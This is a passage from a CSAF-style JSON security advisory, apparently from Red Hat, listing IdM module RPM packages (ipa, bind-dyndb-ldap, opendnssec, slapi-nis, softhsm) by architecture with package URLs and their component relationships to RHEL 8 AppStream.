"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
